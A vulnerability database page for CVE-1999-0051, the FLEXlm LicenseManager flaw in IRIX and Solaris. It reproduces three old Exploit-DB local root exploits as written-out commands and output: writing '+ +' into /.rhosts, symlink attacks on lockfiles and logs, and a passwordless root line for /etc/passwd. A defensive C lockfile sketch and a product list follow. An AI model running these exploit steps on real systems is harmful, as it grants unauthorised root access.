CVE-1999-0051: Detail

CVE-1999-0051

0.04%V3
Local
1999-09-29
02h00 +00:00
2024-08-01
16h27 +00:00

CVE Descriptions

Arbitrary file creation and program execution using FLEXlm LicenseManager, from versions 4.0 to 5.0, in IRIX.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare a CVE's EPSS score with that of other CVEs.

Exploit Information

Exploit Database EDB-ID: 19066

Publication date: 1996-04-04 22h00 +00:00
Author: Arthur Hagen
EDB Verified: Yes

source: https://www.securityfocus.com/bid/72/info

Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to overwrite root-owned files allowing root access.

% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &

Install...
NetLS
Node-locked
Vendor Name: whatever
Vendor ID: + +
Product name: whatever
License version: 1.000
License version:
Expiration date: 01-jan-0
(in license version field put a space)
Apply

License(s) succesfully installed

% cat /.rhosts
#:# "whatever" "whatever" "1.000" "Incomplete"
+ +

If your system has remote root logins disabled, replacing /.rhosts with /etc/passwd and + + with toor:0:0::/:/bin/sh.

Exploit Database EDB-ID: 19067

Publication date: 1996-11-21 23h00 +00:00
Author: Yuri Volobuev
EDB Verified: Yes

source: https://www.securityfocus.com/bid/73/info

Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrarily manipulate root-owned files allowing root access.

% mkdir -p /tmp/var/flexlm
% setenv LICENSEMGR_FILE_ROOT /tmp
% cd /tmp/var/flexlm
% cat > license.dat
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
^D
% ln -s /.rhosts license.dat.log
% LicenseManager &

Next click on Update, fill in the four fields with any information and click on Apply. LicenseManager will report an error. Ignore it and exit.

% cat /.rhosts
Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
% rsh localhost -l root
#

Exploit Database EDB-ID: 19350

Publication date: 1998-10-20 22h00 +00:00
Author: Joel Eriksson
EDB Verified: Yes

source: https://www.securityfocus.com/bid/461/info

The Solaris License Manager that ships with versions 2.5.1 and 2.6 is vulnerable to multiple symlink attacks. License Manager creates lockfiles owned by root and set mode 666 which it writes to regularly. It follows symlinks.

bash$ ls -l /var/tmp/lock*
-rw-rw-rw- 1 root root 0 Oct 21 18:24 /var/tmp/lockESRI
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockISE-TCADd
-rw-rw-rw- 1 root root 0 Oct 21 14:29 /var/tmp/lockalta
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockansysd
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockasterxd
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockhpeesofd
-rw-rw-rw- 1 root root 0 Oct 21 18:46 /var/tmp/locksuntechd

And:

bash$ ls -l /var/tmp/.flexlm
total 2
-rw-rw-rw- 1 root root 163 Oct 21 19:55 lmgrd.211

There are several lockfiles created by the License Manager. It is trivial to gain root access locally through exploitation of this vulnerability.

------
#!/bin/csh -f
# Change target user name before running
# [email protected] 10/98
rm /tmp/locksuntechd
ln -s ~targetuser/.rhosts /tmp/locksuntechd
exit
------

then wait a min and cat + + >> ~targetuser/.rhosts
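
The second and third entries above depend on a root-run license manager writing to a predictable path and following a symbolic link planted there, with the third also noting mode 666 lockfiles. As an added example (not code from this page or from any vendor), the C sketch below shows a lock-file open that refuses planted links and creates the file with mode 0600; `open_lockfile_safely`, `demo_lockfile_checks` and the `/tmp/lockdemo...` scratch paths are assumed names.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper, not vendor code: create a lock file without following
 * symlinks and without reusing a name that someone else already planted. */
int open_lockfile_safely(const char *path)
{
    struct stat st;
    /* O_CREAT|O_EXCL refuses any existing name, including a dangling
     * symlink; O_NOFOLLOW is an extra guard. Mode is 0600, not 0666. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    /* Confirm the descriptor is a regular, singly linked file we own. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario in a scratch directory: "lockdemo" is planted as a
 * symlink to "victim". Returns 1 if the open is refused, "victim" is never
 * created, and a fresh lock (symlink removed) has no group/other bits. */
int demo_lockfile_checks(void)
{
    char dir[] = "/tmp/lockdemoXXXXXX", lock[64], victim[64];
    struct stat st;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(lock, sizeof lock, "%s/lockdemo", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if (symlink(victim, lock) != 0) return -1;
    int refused = open_lockfile_safely(lock) < 0;
    int victim_absent = stat(victim, &st) != 0;
    unlink(lock);
    int fd = open_lockfile_safely(lock);
    int is_private = fd >= 0 && fstat(fd, &st) == 0 && (st.st_mode & 077) == 0;
    if (fd >= 0) close(fd);
    unlink(lock);
    rmdir(dir);
    return refused && victim_absent && is_private;
}

int main(void) { return demo_lockfile_checks() == 1 ? 0 : 1; }
```

Keeping lock files in a directory that only the daemon's account can write to removes the planting opportunity altogether; the open flags are the second line of defence.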

Products Mentioned

Configuration 0

Globetrotter>>Flexlm >> Version 4.0
Globetrotter>>Flexlm >> Version 4.1
Globetrotter>>Flexlm >> Version 5.0
Sgi>>License_oeo >> Version 3.0
Sgi>>License_oeo >> Version 3.1
Sgi>>License_oeo >> Version 3.1.1
Sgi>>Irix >> Version 3.3.2
Sgi>>Irix >> Version 3.3.3
Sgi>>Irix >> Version 4.0
Sgi>>Irix >> Version 4.0.1
Sgi>>Irix >> Version 4.0.1t
Sgi>>Irix >> Version 4.0.2
Sgi>>Irix >> Version 4.0.3
Sgi>>Irix >> Version 4.0.4
Sgi>>Irix >> Version 4.0.4b
Sgi>>Irix >> Version 4.0.4t
Sgi>>Irix >> Version 4.0.5
Sgi>>Irix >> Version 4.0.5_iop
Sgi>>Irix >> Version 4.0.5_ipr
Sgi>>Irix >> Version 4.0.5a
Sgi>>Irix >> Version 4.0.5d
Sgi>>Irix >> Version 4.0.5e
Sgi>>Irix >> Version 4.0.5f
Sgi>>Irix >> Version 4.0.5g
Sgi>>Irix >> Version 4.0.5h
Sgi>>Irix >> Version 5.0
Sgi>>Irix >> Version 5.0.1
Sgi>>Irix >> Version 5.1
Sgi>>Irix >> Version 5.1.1
Sgi>>Irix >> Version 5.2
Sgi>>Irix >> Version 5.3
Sgi>>Irix >> Version 6.0
Sgi>>Irix >> Version 6.0.1
Sgi>>Irix >> Version 6.0.1
Sgi>>Irix >> Version 6.1
Sgi>>Irix >> Version 6.2
Sgi>>Irix >> Version 6.3
Sgi>>Irix >> Version 6.4

Configuration 0

Sun>>Solaris >> Version 2.4
Sun>>Solaris >> Version 2.5
Sun>>Solaris >> Version 2.5.1
Sun>>Sunos >> Version 4.1.1
Sun>>Sunos >> Version 4.1.2
Sun>>Sunos >> Version 4.1.3
Sun>>Sunos >> Version 4.1.3u1
Sun>>Sunos >> Version 4.1.4
Sun>>Sunos >> Version 4.1.4jl
Sun>>Sunos >> Version 5.4
Sun>>Sunos >> Version 5.5
Sun>>Sunos >> Version 5.5.1

References